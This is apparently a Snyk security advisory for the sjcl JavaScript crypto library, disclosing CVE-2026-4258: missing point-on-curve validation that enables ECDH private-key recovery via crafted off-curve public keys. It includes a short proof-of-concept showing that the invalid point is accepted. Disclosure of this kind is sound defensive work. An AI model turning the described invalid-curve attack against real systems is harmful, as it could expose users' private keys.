Improper Verification of Cryptographic Signature Affecting sjcl package, versions *
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JS-SJCL-15369617
- published16 Mar 2026
- disclosed17 Feb 2026
- creditKr0emer
Introduced: 17 Feb 2026
NewCVE-2026-4258 (opens in a new tab)How to fix?
A fix was pushed into the master branch but not yet published.
Overview
sjcl is a Stanford Javascript Crypto Library
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to missing point-on-curve validation in sjcl.ecc.basicKey.publicKey(). An attacker can recover a victim's ECDH private key by sending crafted off-curve public keys and observing ECDH outputs. The dhJavaEc() function directly returns the raw x-coordinate of the scalar multiplication result (no hashing), providing a plaintext oracle without requiring any decryption feedback.
PoC
const sjcl = require('sjcl'); // with ECC loaded
const curve = sjcl.ecc.curves.k256;
// Point NOT on secp256k1 (y² ≠ x³ + 7)
const offCurve = new sjcl.ecc.point(curve, new sjcl.bn(5), new sjcl.bn(1));
console.log('isValid:', offCurve.isValid()); // false
// bitArray path: REJECTS (correct)
try {
new sjcl.ecc.elGamal.publicKey(curve, offCurve.toBits());
console.log('bitArray: accepted');
} catch (e) {
console.log('bitArray: rejected ✓');
}
// point object path: ACCEPTS (bug)
try {
new sjcl.ecc.elGamal.publicKey(curve, offCurve);
console.log('pointObj: accepted ← BUG');
} catch (e) {
console.log('pointObj: rejected');
}